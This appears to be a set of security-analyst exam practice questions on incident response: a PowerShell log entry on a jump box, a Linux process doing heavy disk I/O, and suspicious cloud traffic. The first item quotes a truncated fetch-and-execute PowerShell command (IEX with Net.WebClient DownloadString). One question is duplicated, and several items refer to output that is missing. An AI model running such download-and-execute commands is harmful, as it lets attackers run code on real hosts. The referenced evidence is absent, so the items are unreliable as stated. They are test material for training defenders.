A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:

powershell `IEX(New-Object Net.WebClient).DownloadString ('

Which of the following security controls would have alerted and prevented the next phase of the attack?

1. Antivirus and UEBA
2. Reverse proxy and sandbox
3. EDR and application approved list
4. Forward proxy and MFA

A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.

Based on the output above, from which of the following process IDs can the analyst begin an investigation?

1. 65
2. 77
3. 83
4. 87

A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.

Based on the output above, from which of the following process IDs can the analyst begin an investigation?

Options:

A 65
B 77
C 83
D 87  

Note : if you are not 100% sure then dont answer ... 

A security analyst observes the following while looking through network traffic in a company's cloud log:

Which of the following steps should the security analyst take FIRST?

A.  Quarantine 10.0.5.52 and run a malware scan against the host.

B.  Access 10.0.5.52 via EDR and identify processes that have network connections.

C.  Isolate 10.0.50.6 via security groups.

 D.  Investigate web logs on 10.0.50.6 to determine if this is normal traffic.